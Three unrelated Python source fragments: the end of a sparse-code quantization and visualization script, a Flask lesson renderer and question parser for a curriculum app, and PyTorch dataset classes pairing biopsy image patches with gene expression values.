    # Broadcast a scalar binwidth to every dimension.
    binwidth = np.array([float(binwidth)]*data_dim)
  a_pts_all = []
  c_ass_all = []
  MSE_total = 0
  rate_total = 0
  for cluster in clusters:
    cluster_dim = len(cluster)
    # Quantize only the dimensions belonging to this cluster.
    Xc = data[:,cluster]
    binwidth_c = binwidth[cluster]
    print('cluster of size {}:'.format(cluster_dim),cluster)
    if quant_method=='uni':
      a_pts, c_ass, MSE, rate = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
    elif quant_method=='lloyd':
      # Uniform quantization seeds the Lloyd iteration.
      init_apts, _, _, _ = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
      a_pts, c_ass, MSE, rate = gl(Xc, init_apts, force_const_num_assignment_pts=False)
    elif quant_method=='opt_lloyd':
      init_apts, _, _, _ = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
      # Initial codeword lengths: uniform code over the initial points.
      init_cword_len = (-1. * np.log2(1. / len(init_apts)) *np.ones((len(init_apts),)))
      if device=='numpy':
        a_pts, c_ass, MSE, rate = opt_gl_numpy(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
                                               nn_method=nn_method)
      else:
        try:
          a_pts, c_ass, MSE, rate = opt_gl_torch(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
                                                 nn_method=nn_method, device=device)
        except RuntimeError as e:
          # Cuda mem error; Use numpy
          print("Runtime error: {}".format(e))
          print("Switching to numpy")
          a_pts, c_ass, MSE, rate = opt_gl_numpy(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
                                                 nn_method=nn_method)
    else:
      raise ValueError("Invalid quant_method {}".format(quant_method))
    print('MSE', MSE, 'rate', rate)
    a_pts_all.append(a_pts)
    c_ass_all.append(c_ass)
    MSE_total += MSE
    rate_total += rate
  return a_pts_all, c_ass_all, MSE_total, rate_total
# Cluster the dictionary dimensions, derive per-dimension binwidths from the
# data range, and run the quantizer over every cluster.
clusters = get_clusters(A, num_clusters, algo=clustering_algo)
binwidths = X.ptp(axis=0)/num_bins
a_pts_all, c_ass_all, MSE, rate = compute_quantization_wrapper(X,clusters=clusters,quant_method=quant_method,
                    binwidth=binwidths, device=quant_device, lagrange_mult=lagrange_mult)
print('MSE',MSE)
print('rate',rate)
ass_probs_all = []
codeword_lengths = []
# Compute codeword lengths and assignment_probablities
# Per cluster: the empirical probability of each assignment point and the
# corresponding ideal codeword length -log2(p).
for i in range(len(clusters)):
  a_pts = a_pts_all[i]
  c_ass = c_ass_all[i]
  probs = calculate_assignment_probabilites(c_ass, len(a_pts))
  ass_probs_all.append(probs)
  codeword_lengths.append(-1 * np.log2(probs))
# Save to disk: the learned quantization code (assignment points + codeword
# lengths) plus provenance metadata so the run can be reproduced.
quantization_data = {
  'quant_method':quant_method,
  'dimension':X.shape[1],
  'clusters':clusters,
  'assignment_points':a_pts_all,
  'codeword_lengths':codeword_lengths,
  'trained_on': {
    'dict_file':os.path.basename(dict_file),
    'data_file':os.path.basename(data_file),
    'num_bins':num_bins,
    'binwidths':binwidths,
    'codes_assigned':c_ass_all,
    'clustering_algo':clustering_algo,
    'lagrange_mult':lagrange_mult,
    'MSE':MSE,
    'rate':rate
  }
}
# The Lagrange multiplier only influences the Lloyd-style methods, so record
# it in the filename for those.  (BUG FIX: the original condition was
# inverted -- `!= 'uni'` picked the lambda-free filename for exactly the
# methods that use lambda, and stamped lambda onto uniform runs.)
if quant_method == 'uni':
  quantization_code_file = 'quant_codes/quantization_code__{}D__{}__{}_{}_clusters__{}bins__{}MSE__{}RATE.p'.format(X.shape[1], quant_method, num_clusters, clustering_algo, num_bins, MSE, rate)
else:
  quantization_code_file = 'quant_codes/quantization_code__{}D__{}__{}_{}_clusters__{}bins__{}lambda__{}MSE__{}RATE.p'.format(X.shape[1], quant_method, num_clusters, clustering_algo, num_bins, lagrange_mult, MSE, rate)
# Context manager guarantees the handle is closed even if pickling fails
# (the original leaked the file object from an inline open()).
with open(quantization_code_file, 'wb') as code_fh:
  pickle.dump(quantization_data, code_fh)
# Plotting...
num_clusters = len(clusters)
code_sizes = [a_pts.shape[0] for a_pts in a_pts_all]
max_codesize = max(code_sizes)
# Heatmap: rows = assignment-point index (NaN-padded), columns = clusters.
ass_probs_heatmap = np.zeros((max_codesize,num_clusters))
ass_probs_heatmap.fill(np.nan)
for i in range(num_clusters):
  ass_probs_heatmap[:code_sizes[i],i] = ass_probs_all[i]
# NOTE(review): assumes the per-cluster assignment arrays have equal length so
# they stack into a rectangular array -- confirm.
c_ass_ndarray = np.array(c_ass_all).T
for _ in range(2):
  # Overlay probablity heatmap with code
  random_data_pt = np.random.randint(0,X.shape[0])
  data_img = (Y[random_data_pt] + img_patch_comp_means).reshape(patch_dimensions)
  data_sc = X[random_data_pt]
  # Per-cluster magnitude of this sample's sparse code.
  data_sc_clustered = [np.linalg.norm(data_sc[cluster]) for cluster in clusters]
  data_code = c_ass_ndarray[random_data_pt]
  fig = plt.figure(figsize=(15,8))
  plt.imshow(ass_probs_heatmap, cmap='hot', interpolation='nearest')
  plt.colorbar()
  plt.title("Visualizing random data-point #{}".format(random_data_pt))
  # NOTE(review): 'ro' requests red circles but color='b' overrides to blue.
  plt.plot(c_ass_ndarray[random_data_pt],'ro', color = 'b')
  plt.plot(data_sc_clustered,color = 'r', linestyle='-',linewidth = 1)
  fig.savefig('spare_quant_viz/{}/{}.png'.format(quant_method,random_data_pt))
  plt.close(fig)
|
from abc import ABC, abstractmethod
from enum import Enum
import json
from bs4 import BeautifulSoup, Tag
from flask import render_template
from curriculum import model, repository
from responses import repository as responses_repository
class RenderTarget(Enum):
    """Audience/context a lesson's HTML is being rendered for."""
    AUTHORING = 1   # editing the lesson: html is returned untouched
    TEACHING = 2    # teacher-facing render (is_teacher=True in templates)
    RESPONDING = 3  # student-facing render; saved answers are loaded first
class _HtmlProcessor(ABC):
    """Walks stored lesson HTML and dispatches each question placeholder
    node (class ``wysiwyg_question``) to a type-specific handler that
    subclasses implement."""

    def process_html(self, html: str):
        """Parse ``html``, dispatch every question node to its handler,
        and return the prettified result.

        BUG FIX: a node carrying ``wysiwyg_question`` but none of the known
        question-type classes used to raise StopIteration from ``next()``;
        such nodes are now skipped and left untouched.
        """
        soup = BeautifulSoup(html, 'html.parser')
        node_func_map = {
            'question_choice': self._process_choice_node,
            'question_paragraph': self._process_paragraph_node,
            'question_inline_text': self._process_inline_text_node,
            'question_inline_dropdown': self._process_inline_dropdown_node,
            'question_rubric': self._process_rubric_node
        }
        question_nodes = soup.find_all(class_='wysiwyg_question')
        for node in question_nodes:
            question_class = next(
                (class_name for class_name in node['class'] if class_name in node_func_map),
                None
            )
            if question_class is None:
                # Unknown/malformed question node: leave it as-is rather than
                # crashing the whole render/save.
                continue
            node_func_map[question_class](node)
        return soup.prettify()

    @abstractmethod
    def _process_choice_node(self, node):
        ...

    @abstractmethod
    def _process_paragraph_node(self, node):
        ...

    @abstractmethod
    def _process_inline_text_node(self, node):
        ...

    @abstractmethod
    def _process_inline_dropdown_node(self, node):
        ...

    @abstractmethod
    def _process_rubric_node(self, node):
        ...

    @classmethod
    def _set_question_id(cls, node: Tag, question_id: int):
        """Stamp the persisted question id onto the node as an HTML attribute."""
        node['question_id'] = question_id

    @classmethod
    def _get_question_id(cls, node: Tag):
        """Read the question id attribute (a string), or None when absent."""
        return node.get('question_id')
class LessonRenderer(_HtmlProcessor):
    """Renders stored lesson HTML for a given audience (RenderTarget).

    Each question placeholder node is replaced with the rendered
    response-field template for its question type; when rendering for a
    responding student, the student's saved answers are loaded first so the
    fields come pre-filled.
    """

    def __init__(self, render_target: RenderTarget):
        self.render_target = render_target
        # question_id (int) -> saved answer; populated only for RESPONDING.
        self.question_answer_map = {}

    def process_html(self, html: str, user_id: int, lesson_id: int):
        """Return ``html`` rendered for ``self.render_target``.

        AUTHORING returns the raw html untouched (the editor needs the
        original placeholder nodes). RESPONDING first loads the user's
        answers for this lesson.
        """
        if self.render_target == RenderTarget.AUTHORING:
            return html
        if self.render_target == RenderTarget.RESPONDING:
            self.question_answer_map = responses_repository.AnswerRepository.user_answer_map_for_lesson(
                user_id=user_id,
                lesson_id=lesson_id
            )
        return super().process_html(html)

    def _answer_for(self, question_id):
        """Saved answer for ``question_id`` (an HTML attribute string), or None.

        BUG FIX: guards against nodes missing the question_id attribute,
        which previously crashed on ``int(None)``.
        """
        if question_id is None:
            return None
        return self.question_answer_map.get(int(question_id))

    def _process_choice_node(self, node: Tag):
        question_id = self._get_question_id(node)
        display_html = render_template(
            'response_fields/multiple_choice.html',
            question_id=question_id,
            answer=self._answer_for(question_id),
            options=json.loads(node['options']),
            is_teacher=self.render_target == RenderTarget.TEACHING,
            is_student=self.render_target == RenderTarget.RESPONDING
        )
        self._replace_node(node, display_html)

    def _process_paragraph_node(self, node: Tag):
        question_id = self._get_question_id(node)
        display_html = render_template(
            'response_fields/paragraph_text.html',
            question_id=question_id,
            answer=self._answer_for(question_id),
            is_teacher=self.render_target == RenderTarget.TEACHING,
            is_student=self.render_target == RenderTarget.RESPONDING
        )
        self._replace_node(node, display_html)

    def _process_inline_text_node(self, node: Tag):
        question_id = self._get_question_id(node)
        display_html = render_template(
            'response_fields/inline_text.html',
            question_id=question_id,
            answer=self._answer_for(question_id),
            is_teacher=self.render_target == RenderTarget.TEACHING
        )
        self._replace_node(node, display_html)

    def _process_inline_dropdown_node(self, node: Tag):
        question_id = self._get_question_id(node)
        option_list = json.loads(node['options'])
        display_html = render_template(
            'response_fields/inline_select.html',
            options=option_list,
            question_id=question_id,
            answer=self._answer_for(question_id),
            is_teacher=self.render_target == RenderTarget.TEACHING,
            # id -> text map so the template can display the selected option.
            option_map=json.dumps({
                option['id']: option['text']
                for option in option_list
            })
        )
        self._replace_node(node, display_html)

    def _process_rubric_node(self, node):
        question_id = self._get_question_id(node)
        items_json_str = node['rubric-items']
        answer = self._answer_for(question_id)
        # Grades keyed by rubric item id; empty when nothing was graded yet.
        if answer:
            rubric_grades = {rubric_grade.rubric_item_id: rubric_grade.grade for rubric_grade in answer.rubric_grades}
        else:
            rubric_grades = {}
        display_html = render_template(
            'response_fields/rubric.html',
            is_teacher=self.render_target == RenderTarget.TEACHING,
            question_id=question_id,
            rubric_items=json.loads(items_json_str),
            rubric_grades=rubric_grades,
            answer=answer,
            items_json_str=items_json_str
        )
        self._replace_node(node, display_html)

    @classmethod
    def _replace_node(cls, node, html_str):
        """Swap the placeholder node for the rendered template html."""
        node.replace_with(BeautifulSoup(html_str, 'html.parser'))
class QuestionParser(_HtmlProcessor):
    """Walks lesson HTML as it is being saved and upserts the question data
    embedded in it, resolving client-side temporary ids to persisted ids."""

    def __init__(self, page_id: int):
        self.page_id = page_id
        # Maps of temporary client id -> persisted database id, filled in as
        # questions/options/rubric items are upserted.
        self.id_resolution_map = {
            'questions': {},
            'options': {},
            'rubric_items': {}
        }

    def _process_choice_node(self, node):
        raw_options = json.loads(node['options'])
        pending = self._build_question(
            _id=self._get_question_id(node),
            _type=model.QuestionType.CHOICE,
        )
        pending.options = [
            model.Option(id=raw['id'], text=raw['html'])
            for raw in raw_options
        ]
        saved = self._upsert_and_finalize(question=pending, node=node)
        # Record which persisted id each temporary client option id became.
        for position, raw in enumerate(raw_options):
            if str(raw['id']).startswith('temp-option-'):
                self.id_resolution_map['options'][raw['id']] = saved.options[position].id
        node['options'] = json.dumps([
            {'id': option.id, 'html': option.text}
            for option in saved.options
        ])

    def _process_paragraph_node(self, node):
        pending = self._build_question(
            _id=self._get_question_id(node),
            _type=model.QuestionType.PARAGRAPH,
        )
        self._upsert_and_finalize(question=pending, node=node)

    def _process_inline_text_node(self, node):
        pending = self._build_question(
            _id=self._get_question_id(node),
            _type=model.QuestionType.INLINE_TEXT,
        )
        self._upsert_and_finalize(question=pending, node=node)

    def _process_inline_dropdown_node(self, node):
        raw_options = json.loads(node['options'])
        pending = self._build_question(
            _id=self._get_question_id(node),
            _type=model.QuestionType.INLINE_DROPDOWN
        )
        # Dropdown options never carry usable client ids; the db assigns them.
        pending.options = [
            model.Option(id=None, text=raw.get('text'))
            for raw in raw_options
        ]
        saved = self._upsert_and_finalize(question=pending, node=node)
        node['options'] = json.dumps([
            {'text': option.text, 'id': option.id}
            for option in saved.options
        ])

    def _process_rubric_node(self, node):
        raw_items = json.loads(node['rubric-items'])
        pending = self._build_question(
            _id=self._get_question_id(node),
            _type=model.QuestionType.RUBRIC
        )
        pending.rubric_items = [
            self._get_rubric_item_from_json(item_json=raw)
            for raw in raw_items
        ]
        saved = self._upsert_and_finalize(question=pending, node=node)
        node['rubric-items'] = json.dumps([
            {'id': item.id, 'text': item.text, 'points': item.points}
            for item in saved.rubric_items
        ])
        # Any item that arrived without an id was temporary: expose the full
        # persisted id list so the client can resolve its references.
        if any(item.id is None for item in pending.rubric_items):
            self.id_resolution_map['rubric_items'][saved.id] = [
                item.id for item in saved.rubric_items
            ]
        return node

    @classmethod
    def _get_rubric_item_from_json(cls, item_json):
        """Build a RubricItem from its client json; 'temp...' ids become None."""
        item_id = item_json.get('id')
        if item_id and isinstance(item_id, str) and item_id.startswith('temp'):
            item_id = None
        return model.RubricItem(
            id=item_id,
            text=item_json.get('text'),
            points=item_json.get('points')
        )

    def _upsert_and_finalize(self, question: model.Question, node: Tag):
        """Persist ``question``, stamp its id onto the node, and resolve the
        node's temp-id attribute when present."""
        persisted = repository.QuestionRepository.upsert(question)
        self._set_question_id(node, persisted.id)
        if 'temp-id' in node.attrs:
            self.id_resolution_map['questions'][node.attrs['temp-id']] = persisted.id
            del node.attrs['temp-id']
        return persisted

    def _build_question(self, _id: int, _type: model.QuestionType):
        """Construct an (unsaved) Question bound to this parser's page."""
        return model.Question(
            id=_id,
            type=_type,
            page_id=self.page_id
        )
|
import csv
import gzip
import os
import cv2
from tqdm import tqdm
from time import sleep
import shutil
import matplotlib
import matplotlib.pyplot as plt
import scipy.io
import pandas as pd
import numpy as np
import projectModels
import projectUtilities
import torch
import torchvision
import torchvision.transforms as torchTransform
from torchvision.datasets import ImageFolder, DatasetFolder
from sklearn.decomposition import NMF
from torch.utils.data import Dataset, DataLoader, ConcatDataset
## -------------------------------------------------------------------------
##
## Below: functions used to assist preparaing our data for insertion and usage
## inside the STDL classes that appear in this file
##
## -------------------------------------------------------------------------
def load_dataset_from_images_folder(path_to_images, im_hight_and_width_size):
    '''
    Create a pytorch `ImageFolder` dataset from the given image folder path.

    Each image is resized to a square of side `im_hight_and_width_size`,
    converted to 3-channel greyscale (R==G==B, required by the model inputs
    later), turned into a tensor and normalized from [0,1] to [-1,1].

    BUG FIX: the entry/exit log messages previously named a nonexistent
    function ("load_dataset_from_pictures_folder").
    NOTE: the edge case of a missing/incorrect folder path is not handled.
    '''
    print("\n----- entered function load_dataset_from_images_folder -----")
    tf = torchTransform.Compose([
        # Resize to constant spatial dimensions
        torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
        # Convert image to greyscale (3 channels: R==G==B)
        torchTransform.Grayscale(num_output_channels=3),
        # PIL.Image -> torch.Tensor
        torchTransform.ToTensor(),
        # Dynamic range [0,1] -> [-1, 1]
        torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
    ])
    dataset_object = ImageFolder(os.path.dirname(path_to_images), tf)
    print("\n----- finished function load_dataset_from_images_folder -----\n")
    return dataset_object
def load_augmented_dataset_from_images_folder(path_to_images, im_hight_and_width_size):
    '''
    Create an 8x augmented dataset from the given image folder path.

    Every image appears 8 times: rotated 0/90/180/270 degrees, and the same
    four rotations flipped horizontally. One `ImageFolder` is built per
    transformation and they are concatenated with
    `STDL_ConcatDataset_of_ImageFolders` (defined below in this file).

    BUG FIX: the four "flipped" datasets were previously constructed from
    the NON-flipped transform pipelines, so the augmentation silently
    contained two copies of each unflipped rotation and no flipped images
    at all. The pipelines are now built by a single helper, eliminating the
    copy-paste that caused the bug.

    NOTE: in all rotations image filenames remain the same — this is the
    mapping back to the gene expression values in the stdata dataframe.
    NOTE: the edge case of a missing/incorrect folder path is not handled.
    '''
    print("\n----- entered function load_augmented_dataset_from_images_folder -----")

    def _build_dataset(rotation_degrees, flip):
        # Build one ImageFolder whose pipeline applies the requested flip
        # and fixed rotation, then the shared resize/greyscale/normalize steps.
        steps = [
            # Resize to constant spatial dimensions
            torchTransform.Resize((im_hight_and_width_size, im_hight_and_width_size)),
        ]
        if flip:
            # p=1 == probability for flipping is 1 == always flip
            steps.append(torchTransform.RandomHorizontalFlip(p=1))
        if rotation_degrees:
            # (d, d) range makes RandomRotation deterministic at exactly d degrees
            steps.append(torchTransform.RandomRotation((rotation_degrees, rotation_degrees)))
        steps.extend([
            # Convert image to greyscale (3 channels: R==G==B, needed by the model)
            torchTransform.Grayscale(num_output_channels=3),
            # PIL.Image -> torch.Tensor
            torchTransform.ToTensor(),
            # Dynamic range [0,1] -> [-1, 1]
            torchTransform.Normalize(mean=(.5, .5, .5), std=(.5, .5, .5)),
        ])
        return ImageFolder(os.path.dirname(path_to_images), torchTransform.Compose(steps))

    # Order matches the original: 0/90/180/270, then the same four flipped.
    datasets_to_concatanate = [
        _build_dataset(degrees, flip)
        for flip in (False, True)
        for degrees in (0, 90, 180, 270)
    ]
    final_dataset_object = STDL_ConcatDataset_of_ImageFolders(datasets_to_concatanate)
    print("\n----- finished function load_augmented_dataset_from_images_folder -----\n")
    return final_dataset_object
def perform_log_1p_normalization(df):
    '''
    Apply a log(1 + x) transformation to every entry of the dataframe.

    The raw dataframe holds non-negative integer "count" values; adding 1
    before taking the natural log keeps zero counts mapped to zero.
    Per numpy: "Return the natural logarithm of one plus the input array,
    element-wise. Calculates log(1 + x)."

    Returns a new dataframe; the input is not modified.
    '''
    print(f'performing log1P transformation of the dataframe ...\n')
    # np.log1p is applied column by column via DataFrame.apply
    return df.apply(np.log1p)
def cut_samples_with_no_matching_image_and_reorder_df_mandalay(stdata_df, image_folder_of_the_df):
    '''
    Return `stdata_df` restricted to rows (samples) that have a matching
    image in `image_folder_of_the_df`.

    Samples might be missing from either side: rows of `stdata_df` can lack
    an image, and images can lack a row — only the intersection is kept.
    NOTE: the returned dataframe's rows are reordered (sorted by sample
    name), because `.loc` with a list returns rows in that list's order.

    param stdata_df: pandas dataframe indexed by sample name.
    param image_folder_of_the_df: a plain (non-augmented) ImageFolder; it
        must expose `.samples` as (filename, class) pairs.
    raises NameError: when the folder is not a plain ImageFolder
        (kept as NameError for backward compatibility with callers).

    Changes vs. original: removed the unused `list_of_index_tuples` local,
    fixed the "mathching" typo in the log message, and replaced the manual
    append loop with a comprehension.
    '''
    print(f'cutting samples that dont have matching images in the image folder from the dataframe ...')
    # verify that this is a regular (and not augmented) image folder
    if not hasattr(image_folder_of_the_df, 'samples'):  # augmented = STDL_ConcatDataset_of_ImageFolders, which has no .samples
        raise NameError(' wrong image folder type... insert the regular, not augmented one ')
    # Extract the sample name from each image path.
    # Filename layout assumed: .../images/<sample>_x<col>_y<row>.<ext>
    samples_in_image_folder = [
        filename.partition('_x')[0].partition('/images/')[2].partition('_')[0]
        for filename, _ in image_folder_of_the_df.samples
    ]
    samples_in_stdata_df = stdata_df.index.to_list()
    # Sorted so the resulting row order is deterministic.
    common_samples = sorted(set(samples_in_image_folder) & set(samples_in_stdata_df))
    # .loc with a list keeps only those rows, ORDERED BY the list.
    updated_df = stdata_df.loc[common_samples, :]
    print(f'V done :)\n')
    return updated_df
## -------------------------------------------------------------------------
##
## End of the segment above
## Below: classes used to load and maintain images and stdata information
## These are the actual stdata datasets.
##
## -------------------------------------------------------------------------
class STDL_Dataset_SingleValuePerImg_Mandalay(torch.utils.data.Dataset):
    '''
    `STDL_Dataset_SingleValuePerImg_Mandalay`
    Main custom dataset class pairing biopsy patch images with the expression
    value of ONE chosen gene.
    NOTE: every element of the dataset is a 2d tuple of: (img tensor, gene exp value)
    NOTE: the above gene exp value is for the single gene chosen at construction
    NOTE: this class uses 'lazy allocation' - __init__ only stores references;
          an image is actually loaded and paired with its gene expression
          level only when `__getitem__` is invoked with a specific index.
    '''
    def __init__(self, imageFolder, stdata_dataframe, chosen_gene_name):
        '''
        param imageFolder: either a torchvision `ImageFolder` or the custom
            `STDL_ConcatDataset_of_ImageFolders` (augmented) - distinguished
            below by the presence of a `.samples` attribute.
        param stdata_dataframe: pandas dataframe, rows indexed by sample name,
            columns by gene name.
        param chosen_gene_name: the single gene column this dataset serves.
        raises ValueError: when `chosen_gene_name` is not a column of
            `stdata_dataframe` (callers are expected to use try/except).
        '''
        print("\n----- entering __init__ phase of STDL_Dataset_SingleValuePerImg -----")
        # Save important information from outside
        self.imageFolder = imageFolder
        self.stdata_dataframe = stdata_dataframe
        self.gene_name = chosen_gene_name
        # save additional information
        # len(df.columns)/len(df.index) count columns/rows only; headers are not counted.
        self.num_of_features_stdata_df = len(stdata_dataframe.columns)
        self.num_of_samples_stdata_df = len(stdata_dataframe.index)
        self.size_of_dataset = len(self.imageFolder)  # NOTE: size_of_dataset != num_of_samples when the dataset is AUGMENTED - see if clause below
        # A plain ImageFolder exposes `.samples`; the custom concat dataset does not.
        if hasattr(self.imageFolder, 'samples'):  # meaning this is a regular "ImageFolder" type
            self.num_of_images_with_no_augmentation = self.size_of_dataset
        else:  # meaning this is a custom DS I built - STDL_ConcatDataset_of_ImageFolders
            # the concatenated dataset keeps its original list of datasets; the
            # first one is the original untransformed imageFolder DS
            self.num_of_images_with_no_augmentation = imageFolder.dataset_lengths_list[0]
        '''
        create the reduced dataframe == only the chosen gene's column
        (a pandas Series indexed by sample name)
        '''
        # first get the requested gene's column index + check that the requested
        # gene name actually appears in the stdata_dataframe
        requested_column_index = -1
        if chosen_gene_name not in stdata_dataframe.columns:
            # NOTE(review): message is uninformative - callers creating this
            # dataset are expected to wrap construction in try/except
            raise ValueError('A very specific bad thing happened.')
        else:
            # assumption: the gene name occurs exactly once in the column list
            requested_column_index = stdata_dataframe.columns.to_list().index(chosen_gene_name)
        # get the reduced dataframe
        self.reduced_dataframe = self.stdata_dataframe.iloc[:, requested_column_index]  # the chosen gene's COLUMN over ALL samples (== all rows)
        print("\n----- finished __init__ phase of STDL_Dataset_SingleValuePerImg -----\n")

    def __len__(self):
        # Denotes the total number of samples (augmented copies count separately)
        return len(self.imageFolder)

    def __getitem__(self, index):
        '''
        Generate one sample: attach the y value (gene expression) to the
        single image at `index`. Returns (img tensor, gene exp value).
        '''
        ## get information about the image depending on the object type
        if hasattr(self.imageFolder, 'samples'):  # meaning this is a regular "ImageFolder" type
            curr_filename = self.imageFolder.samples[index][0]
            curr_img_tensor = self.imageFolder[index][0]  # ImageFolder __getitem__ returns (tensor, class); keep the tensor
        else:  # meaning this is a custom DS I built - STDL_ConcatDataset_of_ImageFolders
            curr_img_tensor, curr_filename = self.imageFolder[index]
        # for me
        X = curr_img_tensor  # this is actually X_i
        # get the sample's name from its absolute path and file name;
        # assumed filename layout: .../images/<sample>_x<..> - TODO confirm
        curr_sample_name = curr_filename.partition('_x')[0].partition('/images/')[2].partition('_')[0]
        # get the y value for this sample from the reduced dataframe
        current_gene_expression_value = 0
        if curr_sample_name not in self.reduced_dataframe.index.tolist():  # Note: remember that the reduced df here is a pandas series object
            # "THE DANGEROUS ASSUMPTION": if the stdata file has no entry for
            # this image, its LOG1P normalized value is assumed to be 0
            current_gene_expression_value = 0
        else:
            current_gene_expression_value = self.reduced_dataframe.at[curr_sample_name]
        # for me
        y = current_gene_expression_value
        return X, y
class STDL_ConcatDataset_of_ImageFolders(torch.utils.data.Dataset):
    '''
    `STDL_ConcatDataset_of_ImageFolders`
    Concatenation of ImageFolder datasets into one unified image dataset.

    Assumes every dataset in `datasets_list` is an "ImageFolder" over the
    SAME images (same length, same filenames) but with different transforms.
    Every element is a 2-tuple: (img tensor, image filename).
    '''

    def __init__(self, datasets_list):
        self.datasets_list = datasets_list
        self.dataset_lengths_list = [len(ds) for ds in datasets_list]
        # Cumulative end-offset of each dataset; e.g. sizes [30,30,30] -> [30,60,90].
        self.index_offsets = np.cumsum(self.dataset_lengths_list)
        self.total_size = int(np.sum(self.dataset_lengths_list))
        # All datasets hold the same images, so take length/filenames from the first.
        self.single_dataset_length = self.dataset_lengths_list[0]
        self.list_of_image_filenames = [filename for (filename, not_relevant) in self.datasets_list[0].samples]

    def __len__(self):
        return self.total_size

    def __getitem__(self, index):
        '''
        `index` ranges over the entire concatenated dataset; map it to a
        (dataset, local index) pair using the cumulative offsets.
        '''
        final_index_in_ds = index
        for dataset_index, offset in enumerate(self.index_offsets):
            if index < offset:
                # adjust index into the chosen dataset (no shift needed for the first)
                if dataset_index > 0:
                    final_index_in_ds = index - self.index_offsets[dataset_index - 1]
                curr_filename = self.list_of_image_filenames[final_index_in_ds]
                curr_img_tensor = self.datasets_list[dataset_index][final_index_in_ds][0]
                return curr_img_tensor, curr_filename
        # BUG FIX: previously referenced the nonexistent `self.length`, which
        # raised AttributeError instead of the intended IndexError.
        raise IndexError(f'{index} exceeds {self.total_size}')
class STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay(torch.utils.data.Dataset):
    '''
    `STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay`
    Concatenation of `STDL_Dataset_SingleValuePerImg_Mandalay` datasets into
    one - needed because a separate dataset is created per "patient" /
    "biopsy sample".
    NOTE: every element of the dataset is a 2d tuple of: (img tensor, gene exp value)
    NOTE: the above gene exp value is for a specific gene
    '''

    def __init__(self, list_of_datasets):
        print("\n----- entering __init__ phase of STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay -----")
        # Save important information from outside
        self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay = list_of_datasets
        self._list_of_ds_sizes = [len(ds) for ds in list_of_datasets]
        # Cumulative end-offset of each dataset; e.g. sizes [30,30,30] -> [30,60,90].
        self.index_offsets = np.cumsum(self._list_of_ds_sizes)
        self._list_of_ds_sizes_with_no_augmentation = [ds.num_of_images_with_no_augmentation for ds in list_of_datasets]
        # NOTE(review): despite the singular-sounding name this is a cumulative
        # sum ARRAY of the un-augmented sizes - kept as-is for compatibility.
        self.num_of_images_with_no_augmentation = np.cumsum(self._list_of_ds_sizes_with_no_augmentation)
        self._num_of_all_samples = np.sum(self._list_of_ds_sizes)
        print("\n----- finished __init__ phase of STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay -----\n")

    def __len__(self):
        return self._num_of_all_samples

    def __getitem__(self, index):
        '''
        `index` ranges over the entire concatenated dataset; map it to a
        (dataset, local index) pair using the cumulative offsets.
        '''
        final_index_in_ds = index
        for dataset_index, offset in enumerate(self.index_offsets):
            if index < offset:
                # adjust index into the chosen dataset (no shift needed for the first)
                if dataset_index > 0:
                    final_index_in_ds = index - self.index_offsets[dataset_index - 1]
                # return the entry from the relevant dataset
                return self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[dataset_index][final_index_in_ds]
        # BUG FIX: previously referenced the nonexistent `self.length` (an
        # AttributeError instead of the intended IndexError), and had an
        # unreachable `return` after the raise (now removed).
        raise IndexError(f'{index} exceeds {self._num_of_all_samples}')

    def _save_images_for_leon(self):
        '''
        Temporary helper: dumps sample images showing the differences between
        biopsy samples from 10x genomics and mandalay.
        '''
        ds_mandalay = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-3]
        ds_patient1 = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-2]
        ds_patient2 = self.STDL_ConcatDataset_of_SingleValuePerImg_Datasets_Mandalay[-1]
        from torchvision.utils import save_image
        # save 4 images from ds_mandalay
        save_image(ds_mandalay[10][0], 'leon_mandalay_img1.png')
        save_image(ds_mandalay[11][0], 'leon_mandalay_img2.png')
        save_image(ds_mandalay[12][0], 'leon_mandalay_img3.png')
        save_image(ds_mandalay[20][0], 'leon_mandalay_img4.png')
        # save 4 images from ds_patient1
        save_image(ds_patient1[10][0], 'leon_patient1_img1.png')
        save_image(ds_patient1[11][0], 'leon_patient1_img2.png')
        save_image(ds_patient1[12][0], 'leon_patient1_img3.png')
        save_image(ds_patient1[20][0], 'leon_patient1_img4.png')
        # save 4 images from ds_patient2
        save_image(ds_patient2[11][0], 'leon_patient2_img1.png')
        save_image(ds_patient2[12][0], 'leon_patient2_img2.png')
        save_image(ds_patient2[13][0], 'leon_patient2_img3.png')
        save_image(ds_patient2[20][0], 'leon_patient2_img4.png')
## -------------------------------------------------------------------------
##
## End of the segment above
## Below: functions used to prepare data from mandalay in usable folders.
##
## -------------------------------------------------------------------------
'''
IMPORTANT !
The order of the functions below is crucial:
0. the assumption is that you download all your data from scratch. if you already have what was previously used, this is not needed.
1. Download data from mandalay and 10x genomics
2. use `create_stdata_file_from_mtx` to transform the stdata files from the 10x genomics version (they have 3 files instead of 1: barcodes, features, matrix) into the mandalay version (only 1 file: stdata)
3. use `create_folders_from_new_mandalay_data` on disarray data from mandaly. this creates a folder, with subfolders for each biopsy from mandalay
4. use `create_image_subfolders_in_new_mandalay_data_folders` to create "/images" sub folders iniside biopsy folders mentioned in `3.`
    5. `create_image_subfolders_in_new_mandalay_data_folders` calls `create_smaller_images_from_large_image_in_mandalay_data` for every large biopsy image.
this in turn will cut the large biopsy image into smaller ones using the "spots" files.
'''
def create_folders_from_new_mandalay_data(path_to_dir):
    '''
    One-time helper that organises the raw mandalay download into per-biopsy
    folders.

    :param path_to_dir: folder holding all downloaded files in disarray.
        Only 3 file types are expected: .csv (spots; metadata csvs are
        skipped), .jpg (large biopsy images), .tsv (stdata).

    For every biopsy sample a folder named after the sample is created with:
      1. original_image.jpg
      2. spots.csv
      3. stdata.tsv
    (an "/images" subfolder is added later by a different function)

